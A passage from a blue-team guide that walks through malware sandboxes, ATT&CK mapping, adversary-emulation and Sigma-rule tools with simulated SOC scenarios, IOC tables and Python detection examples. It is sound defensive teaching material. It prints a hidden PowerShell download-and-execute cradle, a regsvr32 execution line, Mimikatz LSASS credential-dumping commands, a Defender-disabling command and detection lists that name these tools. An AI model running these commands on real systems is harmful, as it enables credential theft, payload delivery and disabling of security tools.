CAPE V2 (CONFIG AND PAYLOAD EXTRACTION)
CAPE is an open-source malware sandbox framework focused on extracting malware
configurations and payloads during execution. It extends the Cuckoo Sandbox with
enhancements for handling malware families like Remcos, AgentTesla and RedLine
Stealer.
Use Cases:
• Extract embedded malware configurations such as C2 IPs, domains and keys.
• Run PE files, Office documents, scripts and archives to analyse payload delivery.
• Detect unpacking routines and post-exploitation behaviour.
• Automate reverse engineering of droppers and loaders.
• Use for batch submission of samples during malware outbreak investigations.
Practical Application: A suspicious PowerPoint file is submitted to CAPE V2. The
sandbox identifies embedded macros, drops a VBS file, executes it and extracts the
C2 domain from the binary. The config shows use of Remcos RAT with hardcoded
credentials, enabling rapid IOC creation.
Scenario Simulation: Extracting Malware Configuration Using CAPE V2
Context
Event Type: Suspicious Attachment Investigation
Objective: Extract C2 configuration and embedded payload
Tool: CAPE V2 (Config and Payload Extraction)
Platform: [Link]
Step 1: Incident Trigger
The SOC receives a report of a malicious PowerPoint (.pptx) file named
Invoice_Q3_Summary.pptx sent to multiple finance department users. The email subject
line is “Q3 Payment Breakdown.”
Step 2: Upload Sample to CAPE V2 Sandbox
Action:
1. Analyst logs into the internal CAPE V2 instance
2. Submits Invoice_Q3_Summary.pptx
3. Chooses Windows 10 x64 execution environment
4. Enables macro execution and full memory dump options
5. Initiates the analysis
Step 3: CAPE V2 Output
File Behaviour:
• Embedded Macro Detected in PowerPoint file
• Macro drops file [Link] to C:\Users\Admin\AppData\Roaming\
• VBS script executes hidden PowerShell:
powershell -w hidden -nop -c "IEX(New-Object
[Link]).DownloadString('[Link]
Payload Delivered:
• Downloaded [Link] is a disguised Remcos RAT executable
• Executed using [Link] /s /u /i:"" [Link]
Configuration Extracted by CAPE:
• C2 Address: [Link]:2404
• Campaign Tag: PayInv-Q3
• Mutex: remcos_mutex_xyz
• Credentials Found in Config:
o Username: sysadmin
o Password: Fx$23@rmc
Behavioural Observations:
• Keylogging modules initiated
• Remote desktop component active
• DNS and TCP beaconing to C2 every 15 seconds
Step 4: IOC Summary Table
IOC Type Value
File Name Invoice_Q3_Summary.pptx
Dropped Script [Link]
Payload [Link]
C2 IP [Link]:2404
Campaign PayInv-Q3
Mutex remcos_mutex_xyz
Credentials sysadmin / Fx$23@rmc
Domain Used alt-system[.]info
Step 5: Response Actions
SOC:
• Block C2 domain alt-system[.]info and IP [Link]
• Quarantine affected endpoints
• Revoke compromised domain accounts
• Search for mutex and dropped file ([Link]) in EDR and endpoint logs
• Add hash of [Link] to AV and SIEM blacklist
Threat Intelligence Team:
• Flag campaign as Remcos RAT - Q3 Invoice Bait
• Upload extracted config and payloads to threat intel platform
• Map findings to MITRE ATT&CK
Step 6: MITRE ATT&CK Mapping
Tactic Technique
Initial Access T1203 - Exploitation for Client Execution
Execution T1059.001 - PowerShell
Defense Evasion T1140 - Deobfuscate/Decode Files or Info
Command & Control T1071.001 - Web Protocols (HTTP)
Credential Access T1056.001 - Keylogging
Persistence T1547.001 - Registry Run Keys
Step 7: Automation Recommendation
• Integrate CAPE V2 with internal SOAR to:
o Auto-submit suspicious files from email gateway
o Extract and enrich IOC metadata
o Create automatic blocking rules based on extracted C2s and payloads
HYBRID ANALYSIS
Hybrid Analysis is a free sandboxing service provided by Falcon Sandbox (acquired by
CrowdStrike) that performs static and dynamic analysis on files and URLs. It provides a
threat score, system behaviour logs, network traffic and relationships with known
malware.
Use Cases:
• Analyse attachments, executables and URLs submitted from user reports or alert
investigations.
• Determine threat level using the community score and malware family tags.
• Observe network indicators, DNS resolutions, dropped files and command
executions.
• Link samples to known campaigns or malware families through similarity scoring.
• Export MITRE ATT&CK technique mappings for incident response.
Practical Application: A SOC team detects an unusual executable on an endpoint.
They upload the file to Hybrid Analysis, which shows network activity toward multiple
domains and attempts to steal clipboard content. The sample is linked to Lokibot,
confirming data theft activity.
Scenario Simulation: Malware Behavioural Analysis Using Hybrid Analysis
Context
Event Type: Suspicious Executable Found on Endpoint
Objective: Determine malware behaviour and identify threat family
Tool: Hybrid Analysis ([Link])
Step 1: Initial Trigger
EDR on a finance department workstation detects the presence of an executable file
named [Link] in the user's Downloads folder. The file was downloaded after
the user opened an email titled “Monthly Payment Tracker”.
Step 2: Upload the Sample to Hybrid Analysis
Analyst Actions:
1. Accesses [Link]
2. Logs in with analyst account
3. Uploads [Link]
4. Chooses Windows 10 x64 environment and sets analysis timeout to 5 minutes
5. Enables network simulation and process interaction
Step 3: Analysis Results
Hybrid Analysis Summary:
• Threat Score: 92/100 (High)
• Tags: Stealer, Keylogger, Clipboard Monitor, Network Beaconing
• Malware Family: Lokibot
• File Hash: c8e75f3c1f321a... (SHA256)
• Sample URL: [Link]
Behavioural Observations:
Category Details
Process Creation Spawns [Link], then [Link] silently
Clipboard Access Reads clipboard content containing credentials
Dropped Files Creates [Link] in %AppData%
Network Traffic POST requests to hxxp://login-checker[.]online/[Link]
Registry Changes Adds persistence via HKCU\Software\Microsoft\Windows\Run
DNS Queries login-checker[.]online, [Link][.]cc, check-port[.]org
Step 4: MITRE ATT&CK Mapping
Tactic Technique
Initial Access T1204.002 - Malicious File
Execution T1059.001 - PowerShell
Persistence T1547.001 - Registry Run Keys
Credential Access T1056.001 - Input Capture
Command & Control T1071.001 - Web Protocols (HTTP/S)
Collection T1115 - Clipboard Data
Step 5: IOC Summary Table
IOC Type Value
File Name [Link]
SHA256 c8e75f3c1f321a...
C2 Domain login-checker[.]online
Dropped File [Link]
Persistence Key HKCU\...\Run\svchost-update
DNS Observed [Link][.]cc, check-port[.]org
Step 6: Response Actions
SOC Team:
• Immediately isolate affected host
• Revoke session tokens and reset credentials for the user
• Block all listed domains in firewall and DNS filtering
• Search for presence of dropped file hash in SIEM and EDR telemetry
• Apply YARA rule based on PowerShell usage and persistence keys
Threat Intelligence Team:
• Tag IOC set as “Lokibot – August Phishing”
• Add Hybrid Analysis report to internal threat knowledge base
• Share threat report with external ISAC
Step 7: Automation & Integration Tips
• Use Hybrid Analysis API to automatically:
o Submit files extracted from suspicious emails
o Parse returned report JSON for IOC extraction
o Auto-populate SIEM/Threat Intel Platform with IOC tags and severity
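The automation step above (and the matching steps in the ANY.RUN, Joe Sandbox, CAPE V2 and InQuest Labs sections) comes down to parsing a returned report, pulling out IOCs and deciding whether to alert or contain. This added example shows that logic in Python; it is not code from Hybrid Analysis or any of the other sandboxes. The report schema, the malicious-ASN list and every sample value are assumptions constructed for the example, so the key names must be adapted to the real API's JSON.

```python
"""Triage a sandbox report JSON and extract defanged IOCs.

Added example, not code from Hybrid Analysis, ANY.RUN, Joe Sandbox, CAPE or
InQuest Labs. The report layout below is an ASSUMED schema: each real API
returns its own JSON, so adapt the key names in extract_iocs()/triage().
"""
import ipaddress
import re

# Assumption: ASNs the organisation already treats as hostile (fed from the
# TIP in practice). 64512/64513 are private-use ASN numbers used as placeholders.
KNOWN_BAD_ASNS = {64512, 64513}

# Techniques the scenarios in this section treat as evidence of weaponisation.
WEAPONISATION_TTPS = {"T1059.001", "T1105", "T1055", "T1547.001"}

# Constructed report in the assumed schema (hashes are placeholders).
SAMPLE_REPORT = {
    "threat_score": 92,  # 0-100, as in the Hybrid Analysis scenario
    "dropped_files": [
        {"path": "%AppData%\\svc-update.js", "sha256": "11" * 32},
    ],
    "network": [
        {"dst_ip": "203.0.113.10", "asn": 64512,
         "domain": "login-checker.example", "method": "POST"},
        {"dst_ip": "198.51.100.5", "asn": 64496,
         "domain": "cdn.example", "method": "GET"},
    ],
    "registry": [
        "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\UpdateSvc",
    ],
    "mitre": ["T1204.002", "T1059.001", "T1071.001"],
}


def defang(value):
    """Bracket the dots so an IOC pasted into a ticket cannot be clicked or resolved."""
    return value.replace(".", "[.]")


def extract_iocs(report):
    """Collect domains, IPs, SHA256 hashes and registry keys from the report."""
    iocs = {"domain": set(), "ip": set(), "sha256": set(), "registry": set()}
    for conn in report.get("network", []):
        if conn.get("domain"):
            iocs["domain"].add(defang(conn["domain"]))
        try:
            ipaddress.ip_address(conn.get("dst_ip", ""))
            iocs["ip"].add(defang(conn["dst_ip"]))
        except ValueError:
            pass  # missing or malformed address: skip rather than block garbage
    for dropped in report.get("dropped_files", []):
        digest = dropped.get("sha256", "")
        if re.fullmatch(r"[0-9a-fA-F]{64}", digest):
            iocs["sha256"].add(digest.lower())
    iocs["registry"].update(report.get("registry", []))
    return {kind: sorted(values) for kind, values in iocs.items()}


def triage(report, score_threshold=80):
    """Apply the alert criteria from the automation steps.

    Verdict: 'contain' when two or more criteria fire, 'alert' on one,
    'benign' on none. The default threshold corresponds to the 8/10 cut-off
    used in the Joe Sandbox scenario, normalised to a 0-100 scale.
    """
    reasons = []
    if report.get("dropped_files"):
        reasons.append("file drop observed")
    if any(c.get("asn") in KNOWN_BAD_ASNS for c in report.get("network", [])):
        reasons.append("connection to known malicious ASN")
    ttps = set(report.get("mitre", [])) & WEAPONISATION_TTPS
    if ttps:
        reasons.append("weaponisation TTPs: " + ", ".join(sorted(ttps)))
    score = report.get("threat_score", 0)
    if score > score_threshold:
        reasons.append(f"threat score {score} > {score_threshold}")
    if len(reasons) >= 2:
        verdict = "contain"
    elif reasons:
        verdict = "alert"
    else:
        verdict = "benign"
    return {"verdict": verdict, "reasons": reasons, "iocs": extract_iocs(report)}


if __name__ == "__main__":
    result = triage(SAMPLE_REPORT)
    print(result["verdict"])
    for reason in result["reasons"]:
        print(" -", reason)
    for kind, values in result["iocs"].items():
        print(kind, values)
```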
INQUEST LABS
InQuest Labs offers a malware analysis sandbox and file dissection tools tailored for
email-borne threats. It focuses on extracting embedded threats in documents and emails,
analysing payloads and identifying obfuscated content.
Use Cases:
• Analyse suspicious email attachments like PDFs, Office documents or ZIP files.
• Decompose nested files and scripts to reveal embedded URLs or payloads.
• Observe file behaviour to identify macro execution, file drops and beaconing.
• Detect evasive techniques used in targeted phishing campaigns.
• Enrich threat intelligence with decoded content and static indicators.
Practical Application: During a spear-phishing campaign investigation, an analyst
uploads a ZIP attachment to InQuest Labs. It contains a multi-layered obfuscated
Excel file. The sandbox reveals a hidden macro that drops an EXE and connects to a
known Cobalt Strike C2, triggering an immediate threat response.
Scenario Simulation: Dissecting Email-Borne Malware Using InQuest Labs
Context
Event Type: Spear-phishing Investigation
Objective: Analyse a suspicious ZIP email attachment for embedded threats
Tool: InQuest Labs ([Link])
Step 1: Initial Trigger
A VIP user reports receiving a targeted email with the subject line: "Urgent: Financial Audit
Update". The email contains an attachment named Audit_Report_Q3.zip.
Step 2: Upload Sample to InQuest Labs
Analyst Actions:
1. Accesses [Link]
2. Uploads the suspicious ZIP file Audit_Report_Q3.zip
3. Enables file dissection, macro detection and threat intelligence correlation features
4. Tags the submission for internal case tracking (e.g. case#2025-014-EXE-PHISHING)
Step 3: File Dissection and Static Inspection
Results:
• The ZIP file contains a heavily obfuscated Excel document named Audit-[Link]
• Static analysis reveals:
o AutoOpen macro enabled
o Hex-encoded payload embedded in cell comments
o Base64 strings in hidden worksheet cells
Step 4: Dynamic Behavioural Analysis
Sandbox Behaviour:
• Upon execution:
o Macro runs [Link] with an obfuscated command
o Drops [Link] in %Temp%
o Attempts outbound HTTP connection to hxxp://updatemgr[.]info/agent
o Uses TLS with self-signed cert, suggesting beaconing via HTTPS
Memory Dump and Observations:
• Code injection into [Link]
• C2 server confirmed to be part of known Cobalt Strike beacon infrastructure
• Attempts to disable Windows Defender via PowerShell command
Step 5: Threat Attribution and TTPs
Tactic Technique
Initial Access T1204.002 - User Execution: Malicious File
Execution T1059.001 - PowerShell
Persistence T1547.001 - Registry Run Key
Defense Evasion T1089 - Disabling Security Tools
Command & Control T1071.001 - Application Layer Protocol: Web Traffic
Discovery T1083 - File and Directory Discovery
Step 6: IOC Summary Table
IOC Type Value
File Name Audit_Report_Q3.zip
Extracted File [Link]
Dropped File [Link]
C2 Domain updatemgr[.]info
PowerShell IOC -EncodedCommand aQBlAHgAcAAtAA==
Hash (EXE) d4f28f3b1a... (SHA256)
Step 7: Response Actions
SOC Team:
• Isolates user workstation
• Scans for presence of [Link] across environment
• Blocks C2 domain updatemgr[.]info at firewall and proxy
• Pushes IOC list into EDR and SIEM detection rules
Threat Intel Team:
• Tags case as “CobaltStrike via Email Phish”
• Uploads decoded samples and config to internal repository
• Shares threat report with MSSP partners
Step 8: Automation Recommendation
• InQuest Labs API integration with:
o Email Gateway: Auto-scan ZIP/PDF attachments in high-risk emails
o SOAR Platform: Enrich phishing alerts with dissected content
o SIEM Correlation: Alert when file hash or URL from InQuest reports are seen
in logs
5. MITRE ATT&CK MAPPING AND CONTEXTUALISATION
THREATPURSUIT VM
ThreatPursuit VM is a Windows-based virtual machine designed for threat hunting and
adversary emulation. It comes preloaded with tools and datasets for blue teams to
investigate threats, test detections and map attack techniques to MITRE ATT&CK.
Use Cases:
• Perform hands-on threat hunting and malware analysis in a pre-configured lab
environment.
• Test detection rules or incident response workflows using real-world malware
samples and logs.
• Simulate attacker behaviours to understand how techniques align with ATT&CK
tactics.
• Use built-in tools like Sysmon, KAPE, Velociraptor and ATT&CK Navigator for
enriched investigations.
Practical Application: A SOC analyst uses ThreatPursuit VM to simulate credential
dumping using Mimikatz. The telemetry generated is mapped to ATT&CK T1003 and the
analyst tests whether their SIEM rules detect the activity accurately. The result is
used to improve EDR alerts and detection coverage.
Scenario Simulation: Credential Dumping Simulation and Detection Using ThreatPursuit VM
Context
Event Type: Blue Team Threat Simulation & Detection Validation
Objective: Simulate credential dumping using real-world tools and verify SIEM/EDR
detection
Tool: ThreatPursuit VM ([Link])
Step 1: Environment Setup
SOC Analyst Actions:
• Boots up the ThreatPursuit VM (Windows 10) with the following preinstalled:
o Sysmon with custom config
o KAPE
o Velociraptor
o ATT&CK Navigator
o Sigma rules
o Mimikatz
o Process Monitor
The VM is connected to a lab SIEM to collect logs from Sysmon and Windows Event Logs.
Step 2: Adversary Emulation – Credential Dumping
Execution:
1. The analyst opens Command Prompt with administrator privileges.
2. Executes:
[Link]
privilege::debug
sekurlsa::logonpasswords
3. Mimikatz attempts to dump credentials stored in LSASS memory.
Step 3: Log Generation
Telemetry from Sysmon:
Event ID | Description | Data Captured
1 | Process creation | [Link] spawned by [Link]
10 | Process access | [Link] accessed [Link] with PROCESS_ALL_ACCESS
7 | Image loaded | DLLs loaded for interacting with Windows APIs
11 | FileCreate | Temporary files dropped during execution
Windows Security Logs:
• Event ID 4688 (New Process Creation)
• Event ID 4673 (Privileged Service Called)
Step 4: Mapping to MITRE ATT&CK
Detected Techniques:
Tactic Technique Name Technique ID
Credential Access Credential Dumping T1003
Defense Evasion Obfuscated Files/Scripts T1027
Execution Command and Scripting T1059
Using ATT&CK Navigator on the VM, the analyst maps the behaviour and updates the
detection matrix.
Step 5: Detection Validation in SIEM
SIEM Query:
index=windows_logs (process_name="[Link]" OR
command_line="*sekurlsa::logonpasswords*")
Detection triggered:
• Alert: "Credential Dumping Detected – Mimikatz Activity"
• Log Source: ThreatPursuit VM
• Rule: Sigma Rule – Mimikatz Execution Detected
EDR Feedback:
• Alert raised in parallel due to memory access to [Link]
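The SIEM query and the Sysmon telemetry above can be expressed as detection logic that runs over the raw events rather than relying on one vendor's query language. This is an added example, not ThreatPursuit VM, Sysmon or Sigma project code: it checks Event ID 1 command lines for Mimikatz module names and Event ID 10 for processes opening lsass.exe with memory-read or PROCESS_ALL_ACCESS rights. Field names follow Sysmon's event schema; the allow-list and the sample events are assumptions constructed for the example.

```python
"""Detection logic for the credential-dumping telemetry in this scenario.

Added example, not ThreatPursuit VM, Sysmon or Sigma project code. It applies
two checks to Sysmon events: Event ID 1 (process creation) command lines that
carry Mimikatz module names, and Event ID 10 (process access) where a process
opens lsass.exe with memory-read or PROCESS_ALL_ACCESS rights. The event field
names follow Sysmon's XML names; the events themselves are constructed.
"""

# Win32 process access rights (winnt.h); PROCESS_ALL_ACCESS is the value
# reported as 0x1FFFFF in Sysmon Event ID 10 on Vista and later.
PROCESS_ALL_ACCESS = 0x1FFFFF
PROCESS_VM_READ = 0x0010

# Command-line fragments associated with Mimikatz credential dumping.
MIMIKATZ_MARKERS = ("mimikatz", "sekurlsa::", "lsadump::", "privilege::debug")

# Assumption: processes permitted to read LSASS memory (AV/EDR engines). Keep
# this list short and path-exact; broad allow-listing is how dumps get missed.
ALLOWED_LSASS_READERS = {
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon events (a real pipeline would read these from the SIEM).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Tools\mimikatz.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"EventID": 10, "SourceImage": r"C:\Tools\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe report.txt"},
]


def match_event(event):
    """Return an alert dict for a suspicious event, or None."""
    event_id = event.get("EventID")
    if event_id == 1:
        text = (event.get("Image", "") + " " + event.get("CommandLine", "")).lower()
        hits = [marker for marker in MIMIKATZ_MARKERS if marker in text]
        if hits:
            return {"rule": "Credential Dumping Detected - Mimikatz Activity",
                    "technique": "T1003", "evidence": hits}
    elif event_id == 10:
        if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
            return None
        if event.get("SourceImage", "").lower() in ALLOWED_LSASS_READERS:
            return None
        granted = int(event.get("GrantedAccess", "0x0"), 16)
        if granted == PROCESS_ALL_ACCESS or granted & PROCESS_VM_READ:
            return {"rule": "LSASS Memory Access",
                    "technique": "T1003.001", "evidence": [hex(granted)]}
    return None


def scan(events):
    """Run the checks over a batch; return (index, alert) pairs that fired."""
    alerts = []
    for index, event in enumerate(events):
        alert = match_event(event)
        if alert:
            alerts.append((index, alert))
    return alerts


if __name__ == "__main__":
    for index, alert in scan(SAMPLE_EVENTS):
        print(index, alert["rule"], alert["technique"], alert["evidence"])
```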
Step 6: Action and Coverage Improvement
SOC Outcome:
• SIEM detection rule verified and refined
• Telemetry from ThreatPursuit VM used to tune false positives
• Detection rule tagged with MITRE T1003
• Rule pushed into production SOC environment
Documentation Updated:
• Threat simulation report created
• ATT&CK coverage matrix updated
• Recommendations made to enhance correlation with other credential access TTPs
ATT&CK WORKBENCH
ATT&CK Workbench is a tool developed by MITRE that allows analysts to create, customise
and manage private versions of the ATT&CK knowledge base. It supports extending and
mapping internal threat data to MITRE techniques, building local threat models and linking
detections to adversary behaviours.
Use Cases:
• Create custom techniques, sub-techniques or notes for organisation-specific
threats.
• Map IOCs, alerts or incident data to ATT&CK techniques for structured reporting.
• Maintain an internal, version-controlled threat model aligned with your
environment.
• Use as a central repository for TTP tracking across incidents and red team
exercises.
Practical Application: After analysing an incident involving PowerShell misuse, a blue
team analyst uses ATT&CK Workbench to map the attacker’s behaviour to T1059.001
(PowerShell). They then add a note linking the detection rule, playbook response and
MITRE mapping for use in future playbooks and SOC documentation.
Scenario Simulation: Custom Threat Mapping Using ATT&CK Workbench
Context
Event Type: Post-Incident Threat Mapping
Objective: Map attacker behaviour to MITRE ATT&CK techniques using ATT&CK Workbench
Tool: ATT&CK Workbench ([Link])
Step 1: Incident Trigger
A SOC analyst investigates a confirmed incident where an attacker used a malicious Excel
macro to execute encoded PowerShell commands. The attack bypassed basic antivirus
and exfiltrated data via HTTP POST requests.
Step 2: Extract Observables
Collected IOCs and Behaviours:
• [Link] (delivered through Excel)
• PowerShell command with base64 payload
• Network beaconing to malicious-api[.]com/upload
• File access to C:\Users\Public\[Link]
• HTTP POST to exfiltrate data
Step 3: Map to MITRE ATT&CK Using ATT&CK Workbench
The analyst opens ATT&CK Workbench and creates a new Threat Report Object titled:
Incident - 2025-08-05 - Excel Macro + PowerShell + Exfiltration
Techniques Mapped:
Technique ID | Technique Name | Details Logged
T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell command with base64 string decoded at runtime
T1204.002 | User Execution: Malicious File | Excel file with embedded macro delivering the payload
T1560.001 | Archive Collected Data: Archive via Utility | Sensitive files zipped before exfiltration
T1041 | Exfiltration Over C2 Channel | HTTP POST exfiltration observed to malicious domain
T1113 | Screen Capture | PowerShell payload also included screenshot capture
T1070.004 | Indicator Removal on Host: File Deletion | Macro script deleted evidence post-execution
Step 4: Custom Notes and Enrichment
The analyst uses ATT&CK Workbench to:
• Add custom notes under T1059.001 linking the detection rule used in the SIEM.
• Attach the SOAR playbook name executed in response.
• Create a new Relationship Object linking:
o Detection Rule ID: SPLNK-PWSH-B64-001
o Response Playbook: Playbook_Incident_PowerShell_Exfil
o Tool used: [Link] (for URL detonation and confirmation)
Step 5: Version-Controlled Threat Knowledge Base
ATT&CK Workbench allows this threat object to be saved as part of a local ATT&CK
dataset, enabling:
• Review during purple team exercises
• Alignment of detection engineering efforts
• Visibility into evolving TTPs used against the organisation
Step 6: SOC Integration
SOC Outcome:
• Future incidents with similar behaviour are auto-tagged as ATT&CK-MATCH:
PowerShell Exfiltration
• Detection rule updated with MITRE tag T1059.001
• Playbook decision logic tied to ATT&CK matrix mapping
• Threat knowledge centralised and shareable within internal blue team wiki
ATOMIC RED TEAM
Atomic Red Team is a library of simple, modular adversary emulation tests based on the
MITRE ATT&CK framework. These tests simulate attacker behaviours to validate defensive
controls and detection capabilities.
Use Cases:
• Run controlled tests that replicate specific ATT&CK techniques (e.g., lateral
movement, persistence).
• Evaluate SIEM and EDR detection accuracy across multiple ATT&CK tactics.
• Train SOC analysts on recognising the artefacts of real-world attack behaviours.
• Integrate tests into CI/CD or purple team automation for ongoing detection
validation.
Practical Application: A detection engineer wants to test coverage for ATT&CK
technique T1055 (Process Injection). They execute the relevant Atomic Red Team test
and observe whether their XDR and SIEM log the event properly. If telemetry is
missing, log collection and parsing rules are updated.
Scenario Simulation: Validating SOC Detection Coverage Using Atomic Red Team
Context
Objective: Evaluate and validate detection coverage for process injection (MITRE ATT&CK
T1055) using Atomic Red Team
Tool: Atomic Red Team ([Link])
Environment: Windows 10 with Sysmon + Elastic SIEM
Step 1: Setup and Pre-Check
Pre-requisites:
• Atomic Red Team repository cloned
• PowerShell execution policy set to allow local scripts
• Detection environment: Sysmon + Winlogbeat → Logstash → Elasticsearch → Kibana
• ATT&CK Navigator used to visualise gaps
Command Used:
Invoke-AtomicTest T1055 -TestNumbers 1
This executes a simulated Process Injection using PowerShell and Windows API calls to
mimic malicious injection behaviour.
Step 2: Activity and Observables
Behaviour:
• A benign process (e.g., [Link]) is launched
• A secondary script injects code into it
• Sysmon logs:
o Process access (Event ID 10)
o Memory write attempts (Event ID 10)
o DLL loads (Event ID 7)
Expected Telemetry:
Source | Event ID | Description
Sysmon | 1 | Process Create (atomic runner script)
Sysmon | 7 | DLL Load
Sysmon | 10 | Process Access - injection indicators
Defender | - | Possibly suppressed (test EICAR-safe)
XDR Agent | - | Alerts on abnormal process injection
Step 3: Detection Validation in SIEM
Query Used (KQL in Kibana):
[Link]: "10" and [Link]: "[Link]" and [Link]: "*inject*"
Result:
• No logs were returned
• Manual review shows Winlogbeat was not parsing Sysmon Event ID 10 correctly
Step 4: Response and Improvement
Action Taken:
• Winlogbeat config updated to include missing Event IDs
• Parser rules adjusted for custom field mapping
• Re-ran the test with:
Invoke-AtomicTest T1055 -TestNumbers 1 -GetPrereqs -Cleanup
New Result:
• Alert generated in Elastic under custom rule SIGMA - Suspicious Process Injection
• Mapped to MITRE T1055 with enrichment tags
Step 5: Documentation and Mapping
Using ATT&CK Navigator, the detection is now marked GREEN under:
Technique ID | Technique Name | Notes
T1055 | Process Injection | Detection rule validated with ART test
Playbook Updated:
• Added detection rule ID and associated telemetry source
• Linked to response automation for privilege escalation investigation
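The validation loop in Steps 2 to 4 (did the expected Sysmon events reach the SIEM, and did any Event ID 10 record look like injection) can be checked in code before an analyst opens Kibana. The following is an added example and is not Atomic Red Team, Sysmon or Elastic code. The documents are constructed in a Winlogbeat-style layout (event.code, winlog.event_data.*), which is an assumption about the shipper's mapping, and the GrantedAccess shortlist is a starting point to tune against your own baseline.

```python
"""Validate that a process-injection test produced the expected Sysmon telemetry.

Added example; not Atomic Red Team, Sysmon or Elastic code. It takes Sysmon
events as Winlogbeat ships them to Elasticsearch (only the fields used here are
modelled) and reports two things: which expected Event IDs never reached the
SIEM, and which Event ID 10 (ProcessAccess) records requested access rights
typical of injection. The sample documents and the access-mask list are
constructed for the example.
"""
from collections import Counter

# Expected telemetry for the T1055 test, as in the table above.
EXPECTED_EVENT_IDS = {1: "Process Create", 7: "DLL Load", 10: "Process Access"}

# GrantedAccess masks frequently requested when writing into another process
# (PROCESS_ALL_ACCESS plus a few VM_WRITE/CREATE_THREAD combinations).
# Constructed shortlist; tune it against your own baseline.
SUSPICIOUS_GRANTED_ACCESS = {0x1F0FFF, 0x1FFFFF, 0x143A, 0x1438, 0x1F3FFF}

# Constructed Winlogbeat-style documents. The field layout (event.code,
# winlog.event_data.*) is an assumption about the shipper's mapping.
SAMPLE_EVENTS = [
    {"event": {"code": 1},
     "process": {"name": "powershell.exe"}},
    {"event": {"code": 7},
     "process": {"name": "powershell.exe"},
     "file": {"name": "clr.dll"}},
    {"event": {"code": 10},
     "process": {"name": "powershell.exe"},
     "winlog": {"event_data": {
         "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
         "TargetImage": "C:\\Windows\\System32\\notepad.exe",
         "GrantedAccess": "0x1F0FFF"}}},
    {"event": {"code": 10},
     "process": {"name": "explorer.exe"},
     "winlog": {"event_data": {
         "SourceImage": "C:\\Windows\\explorer.exe",
         "TargetImage": "C:\\Windows\\System32\\svchost.exe",
         "GrantedAccess": "0x1000"}}},
]


def event_code(doc):
    return int(doc.get("event", {}).get("code", -1))


def without_event(events, code):
    """Drop one Event ID, simulating a shipper that fails to parse it."""
    return [e for e in events if event_code(e) != code]


def coverage_report(events, expected=EXPECTED_EVENT_IDS):
    """Return (counts per expected id, sorted list of missing ids)."""
    counts = Counter(event_code(e) for e in events)
    seen = {eid: counts.get(eid, 0) for eid in expected}
    missing = sorted(eid for eid, n in seen.items() if n == 0)
    return seen, missing


def injection_indicators(events, suspicious=SUSPICIOUS_GRANTED_ACCESS):
    """Event ID 10 records whose GrantedAccess mask is on the suspicious list."""
    hits = []
    for doc in events:
        if event_code(doc) != 10:
            continue
        data = doc.get("winlog", {}).get("event_data", {})
        try:
            mask = int(data.get("GrantedAccess", "0"), 16)
        except ValueError:
            continue
        if mask in suspicious:
            hits.append({"source": data.get("SourceImage"),
                         "target": data.get("TargetImage"),
                         "granted_access": hex(mask)})
    return hits


def validate(events):
    """One-shot verdict: coverage gaps first, then detection evidence."""
    seen, missing = coverage_report(events)
    indicators = injection_indicators(events)
    return {"seen": seen, "missing": missing, "indicators": indicators,
            "detection_validated": not missing and bool(indicators)}


if __name__ == "__main__":
    # First run in the scenario above: Event ID 10 never reached the SIEM.
    print(validate(without_event(SAMPLE_EVENTS, 10)))
    # After the shipper fix, all three event types arrive and injection is visible.
    print(validate(SAMPLE_EVENTS))
```

A coverage gap is reported before any detection verdict, which is the order that matters: a rule that never fires because its source event is missing looks identical to a rule that fires on nothing.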
SIGMA HQ
Sigma HQ is the official repository and development hub for Sigma rules, a generic
signature format that allows analysts to write SIEM-agnostic detection rules mapped to
MITRE ATT&CK techniques.
Use Cases:
• Write and use threat detection rules across various log sources (e.g., Windows
Event Logs, Sysmon, firewall logs).
• Map detections to ATT&CK techniques for structured threat detection coverage.
• Translate Sigma rules into SIEM-specific query formats using tools like sigmac.
• Standardise detection logic and ensure portability across different platforms.
Practical Application: A detection engineer creates a Sigma rule to detect attempts to
disable Windows Defender. The rule is mapped to ATT&CK T1562.001 (Impair
Defenses: Disable or Modify Tools). Using sigmac, the rule is converted into a Splunk
query and deployed into production with proper alerting logic.
Scenario Simulation: Writing and Deploying a Sigma Rule for Threat Detection
Context
Objective: Detect any attempt to disable Microsoft Defender via command-line tools
Tool: Sigma HQ + sigmac (converter)
Technique: MITRE ATT&CK T1562.001 – Impair Defenses: Disable or Modify Tools
SIEM Target: Splunk
Step 1: Create a Sigma Rule
The detection engineer writes the following Sigma rule (defender_disable.yml):
title: Windows Defender Disabling via Command Line
id: d5f2d0b3-9bdf-441a-9210-e11b2ec8a0f5
status: experimental
description: Detects command-line attempts to disable Microsoft Defender
author: Izzmier
date: 2025/08/05
references:
- [Link]
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- "Set-MpPreference"
- "-DisableRealtimeMonitoring"
- "[Link]"
- "-RemoveDefinitions"
condition: selection
fields:
- CommandLine
- ParentImage
- Image
level: high
tags:
- attack.defense_evasion
- attack.t1562.001
Step 2: Convert the Rule to Splunk
Using sigmac:
sigmac -t splunk -c tools/config/[Link] defender_disable.yml > defender_disable_splunk.txt
Generated Splunk Query:
(CommandLine="*Set-MpPreference*" OR CommandLine="*-DisableRealtimeMonitoring*" OR CommandLine="*[Link]*" OR CommandLine="*-RemoveDefinitions*")
Step 3: Deploy to SIEM
• The detection engineer logs into Splunk.
• The query is added under a scheduled search titled “[DETECT] Defender Disabling
Attempt”
• Alert threshold: > 0 per 5 minutes
• Email alert + SOAR webhook integration triggered if matched
Step 4: Test and Simulate
Test Command (lab environment):
Set-MpPreference -DisableRealtimeMonitoring $true
Sysmon Event Logged:
Field | Value
Image | [Link]
